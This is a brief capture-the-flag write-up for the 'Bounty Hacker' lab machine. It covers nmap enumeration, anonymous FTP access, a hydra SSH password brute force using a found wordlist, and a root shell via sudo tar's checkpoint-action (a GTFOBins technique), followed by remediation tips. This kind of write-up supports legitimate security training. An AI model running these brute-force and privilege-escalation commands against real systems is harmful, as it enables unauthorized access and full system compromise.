[Linux] Bounty Hacker

Enumeration

sudo nmap 10.10.10.243

sudo nmap -A -p 21,22,80 10.10.10.243

HTTP

The website doesn't reveal any crucial information for the pentest.

FTP

We see that we can make an anonymous login on the ftp service.

ftp 10.10.170.79

There are two files on the ftp server:

• task.txt which coontains some indication "signed" by someone called lin;

• locks.txt which contains ununderstandable words.

Exploitation

One hint would be to use locks.txt to do a dictionnary attack on lin password for ssh service.

hydra -s 22 -l lin -P locks.txt 10.10.10.243 ssh -V

Yes! It works. We can use this password to connect to the target via SSH.

We find the user flag this way in user.txt.

Privilege escalation

For escalation, a good abit is to check what sudo command the user can perform on the target.

sudo -l

We can use GTFOBINs to see how we can exploit this.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Remediation

• Use SCP service from the SSH protocole instead of FTP.

• Use a password manager instead of writing passwords in clear text in a file.

• Check sudo right on machines.